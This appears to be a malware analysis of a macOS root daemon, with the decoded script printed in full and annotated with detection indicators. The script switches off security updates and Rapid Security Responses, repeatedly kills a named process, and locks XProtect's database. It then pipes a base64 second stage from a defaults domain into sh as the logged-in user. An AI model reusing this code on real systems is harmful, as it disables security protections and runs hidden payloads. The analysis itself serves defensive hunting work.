
找到的主脚本如下
# Extraction step: the daemon body is kept as a base64 string in the macOS preferences
# domain `fqijeu` under key `lqqr_djhxqjf` (a second key in the same domain,
# `burlh_dqeur_rkq`, is read at runtime by the decoded script). For hunting, the plist
# backing the `fqijeu` domain and any "defaults read ... | base64 --decode" process
# chain are the primary artifacts of this sample.
defaults read fqijeu lqqr_djhxqjf | base64 --decode
# Analyst annotation of the decoded daemon body. Comments only; the commands are
# byte-identical to the sample, re-flowed one statement per line. Quoted names
# (defaults domain, plist keys, paths, process name) are the observable artifacts a
# detection should key on.
date
whoami
cd /Users/Shared
pwd

# Runs in the daemon's own (root) context. Three actions, all aimed at Apple's
# built-in protection/update machinery:
root_tasks() {
  # 1. Disable background installation of system data files / security updates
  #    (ConfigDataInstall) and Rapid Security Responses. Either key set to false in
  #    com.apple.SoftwareUpdate.plist on a managed host is a strong tamper signal.
  /usr/bin/defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist ConfigDataInstall -bool false
  /usr/bin/defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist AllowRapidSecurityResponses -bool false

  # 2. Once per second, SIGKILL every process whose command line matches
  #    'CloudTelemetryService' (case-insensitive, -fi). What that process is cannot be
  #    told from the sample; a tight pgrep/kill -9 loop is itself an anomaly in
  #    process telemetry.
  kill_processes() {
    while true; do
      pgrep -fi 'CloudTelemetryService' | xargs -r -I {} sh -c 'kill -9 {} && echo "killed PID {}"'
      sleep 1
    done
  }
  kill_processes &

  # 3. Take an exclusive flock (mode 2 == LOCK_EX) on XProtect's database and hold it
  #    forever (the loop only sleeps). This presumably interferes with XProtect's use of
  #    XPdb — confirm against the XProtect build on the host. A long-lived perl process
  #    with /var/protected/xprotect/XPdb open is an indicator (lsof, fs_usage).
  perl -e 'open my $fh, "<", "/var/protected/xprotect/XPdb" or die $!; flock($fh, 2) or die $!; while (1) { sleep 60; }' &

  echo "I am a root task $(whoami)"
}

# Blocks until a single ping to 1.1.1.1 succeeds, then invokes the function or command
# named in $1. While offline this produces one ICMP probe to 1.1.1.1 every 5 s, which
# is a low-value but visible network artifact.
network_tasks() {
  while ! ping -c1 -W1 1.1.1.1 &> /dev/null ; do
    echo 'no net'
    sleep 5
  done
  echo 'net available'
  "$1"
  echo 'network task completed.'
}

# Waits for an interactive console user (scutil State:/Users/ConsoleUser, skipping
# loginwindow), then — once network is up and after a further 30 s — launches the
# second stage AS THAT USER via sudo -u. The stage is read from the same `fqijeu`
# defaults domain (key `burlh_dqeur_rkq`), base64-decoded and piped straight into sh
# with SRC=Daemon in the environment, so this step itself writes nothing to disk.
# Behaviours to alert on: a root daemon spawning `sudo -u <console user> /bin/bash`,
# and the "defaults read ... | base64 --decode | ... sh" process chain.
localuser_tasks() {
  while true; do
    localuser=$(scutil <<< "show State:/Users/ConsoleUser" | awk '/Name :/ && ! /loginwindow/ { print $3 }')
    if [[ -n "$localuser" ]]; then
      break
    fi
    echo 'No logged-in user. Retrying...'
    sleep 5
  done
  echo "[LOGGED IN] $localuser"

  task() {
    sleep 30
    # The heredoc body is the command line the user-context bash executes; stdout and
    # stderr of the stage are discarded and it is backgrounded immediately.
    sudo -u "$localuser" /bin/bash <<EOF
defaults read 'fqijeu' 'burlh_dqeur_rkq' | base64 --decode | env SRC='Daemon' sh >/dev/null 2>&1 &
EOF
  }
  network_tasks task &
}

# Kill switch, evaluated every 60 s: if /Users/echo/.kill exists, delete every
# LaunchDaemon plist whose contents match 'echo.*base64.*sh' (by the pattern, this is
# the loader that decodes and runs this script — inferred, the plist is not shown
# here), remove the flag file and exit. For responders the same grep over
# /Library/LaunchDaemons/ locates the persistence plist(s), and /Users/echo/ is a
# path worth checking.
loop_tasks() {
  echo 'Daemon is running...'
  if [ -e "/Users/echo/.kill" ]; then
    echo 'killing...'
    grep -lir 'echo.*base64.*sh' /Library/LaunchDaemons/ 2>/dev/null | while read -r file; do
      echo "$file"
      rm -f "$file"
    done
    rm -f "/Users/echo/.kill"
    echo 'killed.'
    exit
  fi
}

# Entry point: the root-level tampering and the user-stage launcher run concurrently
# in the background; the kill-switch check is re-spawned once a minute.
root_tasks &
localuser_tasks &
while true; do
  loop_tasks &
  sleep 60
done